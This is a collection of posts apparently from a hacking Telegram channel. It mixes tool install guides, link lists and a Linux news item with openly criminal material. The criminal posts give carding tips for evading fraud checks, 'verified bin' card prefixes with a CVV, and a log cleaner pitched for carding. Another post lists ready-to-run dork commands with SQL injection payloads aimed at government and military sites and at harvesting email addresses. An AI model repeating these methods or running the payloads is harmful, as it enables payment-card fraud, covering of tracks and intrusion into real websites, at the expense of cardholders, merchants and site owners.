🦑BEST HACKING PYTHON LIBS :

Python: https://www.python.org/downloads/

PyCurl: http://pycurl.sourceforge.net/

PyBeautifulSoup4: https://pypi.org/project/beautifulsoup4/

PyGeoIP: https://pypi.org/project/pygeoip/

PyGObject: https://pypi.org/project/gobject/

PyCairocffi: https://pypi.org/project/cairocffi/

PySelenium: https://pypi.org/project/selenium/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#FastTips :Much Required Advice for Beginners :
(#carding tips)

1️⃣ Using socks5 that fit the billing address of the cardholder (dont using socks4 or http proxies because they can leak DNS info).

2️⃣If your CC comes from UK, try using a drop in UK and so on for other countries

3️⃣If there is a gift choice, place it so it looks like you're sending a present to some buddy, girlfriend and so on.

4️⃣ Seek to render requests such as valentines before holidays etc. That's an ancient strategy now but it works for 2 purposes. These days the shops are having a ton of requests, and they can transfer one of the scams as genuine as well. So it seems as though you are giving a legit gift

5️⃣ Using cracked / open wifi + modified MAC, VPN in some offshore country + 2-3 sockets in a virtual machine for your protection. I recommend you import VMWare and a ready-made file to launch it. Attempt to build your own encryption proxy chain, with the last external IP that fits the address of the cardholders.

6️⃣Using Firefox with Plugins in private mode. Found several extensions relevant to protection that do not control connections, transparent cookies, LSO & flash cookies, etc. Be imaginative, and learn.

7️⃣Use gmail / hotmail / yahoo when ordering or Use @some hipster email provider, one that many people don't really use. It does make things seem legal.

8️⃣Attempt also to card on Weekends as shops unable to touch and search Extra bank info, by calling them. You may even test the time the closes Bank

9️⃣Please send an email to the vendor shortly after finishing the order to ship.

🔟Fast as you desperately need it, as there is some purpose in your building.

1️⃣1️⃣Do not use a cc on the same site with separate Accounts.
Full record: 3-4 Years max.

1️⃣2️⃣ When you use the pp in carding instead purchase pp with email
access and remove the order linked emails from the email inbox and trash box

CARDING IS FOR LEARN, NOT FOR STEAL !!!

Share us❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 webhacking-
- find admin login pages and EAR vulnerabilites.
-Termux/Linux

🦑Features :

> Multi-threading on demand

> Big path list (482 paths)

> Supports php, asp and html extensions

> Checks for potential EAR vulnerabilites

> Checks for robots.txt

> Support for custom patns

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/s0md3v/Breacher.git

2️⃣cd Breacher

3️⃣EXAMPLES :

> Check all paths with php extension
python breacher -u example.com --type php

> Check all paths with php extension with threads
python breacher -u example.com --type php --fast

> Check all paths without threads
python breacher -u example.com

> Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:

python breacher -u example.com --path /data

🦑STILL TROUBLE ?
> https://youtu.be/BEpt5JmcWPk

enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 BROWSER LOG CLEANER(Carding) & System logs REMOVER :
BleachBit cleans files to free disk space and to maintain privacy.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/bleachbit/bleachbit.git

2️⃣cd bleachbit

3️⃣Then install via make command 
> make -C po local # build translations

4️⃣python3 bleachbit.py

5️⃣For information regarding the command line interface, run:

>  python3 bleachbit.py --help

🦑TESTED ON':

-PARROT

-KALI

-UBUNTU

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🆂🆄🅿️🅿️🅾️🆁🆃 & 🆂🅷🅰️🆁🅴 :

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Run Python Hacking Scripts Via windows :
#FastTips

1️⃣Download
> https://www.python.org/downloads/windows/

2️⃣Run setup file

3️⃣Download :
https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16

4️⃣run setup
video tutorial :
> https://www.youtube.com/watch?v=n5sJ4EewKGk&autoplay=1

5️⃣Go powerShell and type :

> pip install --upgrade setuptools

6️⃣Now you can install git:

https://git-scm.com/download/win
(Download & run)
& more libs from powershell
& load and Python Script

ENJOY ❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux-Termux tip :
What is BBQSQL?

> Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.

> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/Neohapsis/bbqsql.git

2️⃣cd bbqsql

3️⃣install in one command :
sudo pip install bbqsql (kali-parrot repo)

4️⃣for termux
>  python setup.py install

5️⃣The query syntax is based around placeholders which tell BBQSQL how to execute the attack ?
➕Example :

You need to provide the following placeholders of information in order for the attack to work. Once you put these in your query, bbqSQL will do the rest:

${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.

${char_index}: This tells bbqSQL which character from the subselect to query.

${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.

${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.

${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.

Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.

6️⃣FOR MORE EXAMPLES :
https://github.com/Neohapsis/bbqsql#install

🦑Features :

URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Privilege Escalation☠️Methodes & Tools :


> [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE

> [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation

> [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)

> [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb

> [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows

> [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors

> [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation

> [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation – Tradecraft Security Weekly (Video)

> [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script

> [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered

> [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable

> [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS

> [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.

> [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script

> [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation

> [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux

> [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux


ENJOY ❤️👍🏻
✅Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Online News Sources :

> InfoSec | covers all the latest infosec topics

> Recent Hash Leaks | great place to lookup hashes

> Security Intell | covers all kinds of news, great intelligence resources

> Threatpost | covers all the latest threats and breaches

> Secjuice

> The Hacker News | features a daily stream of hack news, also has an app

ENJOY ❤️👍🏻
✅Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some resources for Beginers :


- How to Become a Successful Bug Bounty Hunter

- Researcher Resources - How to become a Bug Bounty Hunter

- Bug Bounties 101

- The life of a bug bounty hunter

- Awsome list of bugbounty cheatsheets

- Getting Started - Bug Bounty Hunter Methodology

:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣ git clone https://github.com/googleinurl/SCANNER-INURLBR.git

2️⃣cd SCANNER-INURLBR

3️⃣$chmod +x inurlbr.php

4️⃣ ./inurlbr.php

5️⃣To get a list of basic options and switches use:

php inurlbr.php -h

6️⃣SOME EXAMPLES :

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'

./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'

./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'

./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'

./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'

./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'



Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

Follow Undercode Testing on :

> Twitter

> instagram

> Facebook

> Pinterest

> Linkedln

> Youtube

> Telegram

IDS, IPS AND FIREWALL EVASION USING NMAP- full guide -

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Developers added a series of RISC-V UEFI support patches for Linux
#UndercodeNews

> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed to form a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, some developers have submitted a series of patches to solve a large number of problems while adding some new capabilities to support RISC-V UEFI under Linux.

> Developer Atish Patra is from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common efi and riscv issues; patches 7-9 add Efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different code; patch 11 adds runtime services for RISC-V.

🦑To sum up, the main contributions of this series of patches are:

➕Added full ioremap support.
➕Added efi runtime service support.
➕Fixed the mm problem.

> At present, the patch has been verified on Qemu using the bootefi command in U-Boot, and has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems of EDK2 code on RISC-V are still being solved, mainly the problems related to SPI and network driver.

> This series of patches hits the Linux kernel 5.8-rc2 and is still in the PR state, waiting for the code review. If the related issues are resolved and finally accepted, then it should be visible when Linux 5.8 is released.

Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New 2020 Linux Distributions-Good for any Linux developer :

[The Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 (32-bit) and x86_64 (64-bit) versions are available.

Computer Aided Investigative Environment (CAINE) - Contains numerous tools that help investigators during their analysis, including forensic evidence collection.

[CCF-VM](https://github.com/rough007/CCF-VM) - CyLR CDQR Forensics Virtual Machine (CCF-VM): An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.

Digital Evidence & Forensics Toolkit (DEFT) - Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit (DART) for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.

[NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.

PALADIN - Modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.

[Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Special Linux distro aimed at network security monitoring featuring advanced analysis tools.

SANS Investigative Forensic Toolkit (SIFT) Workstation - Demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.


Enjoy❤️👍🏻
✅2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some Verified Bin- from few days :

➕ Bin For XBox✅ :

Bin : 4095890041xxxxxx

CVV/Date: RND
IP : USA🇺🇸

➕ Bin For SoundCloud Go✅

Bin : 5422175006xxxxxx

Date: 05/21
CVV : 917
IP : USA 🇺🇸

➕Bin For Skype ✅

Bin : 515462003565xxxx

CVV/Date: RND
IP : USA 🇺🇸

➕Cc GENETRATORS
> https://t.me/UNDERCODEHACKING/2150

Enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁